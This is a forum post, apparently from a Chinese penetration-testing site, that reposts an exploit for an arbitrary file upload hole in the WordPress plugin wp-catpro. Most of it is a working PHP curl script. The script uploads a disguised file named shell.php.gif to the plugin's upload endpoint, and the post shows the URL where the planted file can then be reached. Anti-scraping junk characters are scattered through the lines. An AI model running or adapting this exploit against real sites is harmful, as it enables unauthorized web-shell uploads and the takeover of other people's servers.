中国网络渗透测试联盟

标题: WordPress插件wp-catpro任意文件上传 [打印本页]

---

作者: admin    时间: 2013-2-27 20:12
标题: WordPress插件wp-catpro任意文件上传
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
' y$ Z! d1 [& Z2 F% U0 O; u1 Y3 N#-----------------------------------------------------------------------
4 F/ R. m4 F0 h* {. |$ @4 k5 m  v
作者  => Zikou-16
- R  {9 g* B; l- @; V邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
" w+ h3 n7 f( k7 S1 b: }$ o# H# a; M, h
#=> Exploit 信息:
------------------
* w8 Z) \, y9 C& b' e! {& K9 C# 攻击者可以上传 file/shell.php.gif
6 Z, n) F3 V, }1 A1 x) G0 u# ("jpg", "gif", "png")  // Allowed file extensions
5 d/ q1 T+ b% u8 C2 T. d# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
$ M4 N% p7 ~$ L( \# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
9 f: K8 A+ d7 G& T! s- H
#=> Exploit
-----------
+ w+ ?# _" }) F; P* `% l8 ]) o<?php
1 r% f% N6 f2 }) I1 \$ y$ L) K
$uploadfile="zik.php.gif";
5 ^7 E6 c8 i' {$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
" j: Q% h: Y8 u, K7 W2 I+ n'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
! c+ y4 i) l0 E/ m0 ]1 |3 |
print "$postResult";

! k( K, M4 M2 \Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
# [3 p/ c+ o% p0 m0 L) ?5 w  ?>
<?php
2 e8 R& ?4 [( h3 ]. ]; R" \* E' ^phpinfo();
% D( {2 ^9 C0 P1 X" H# k; T?>

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2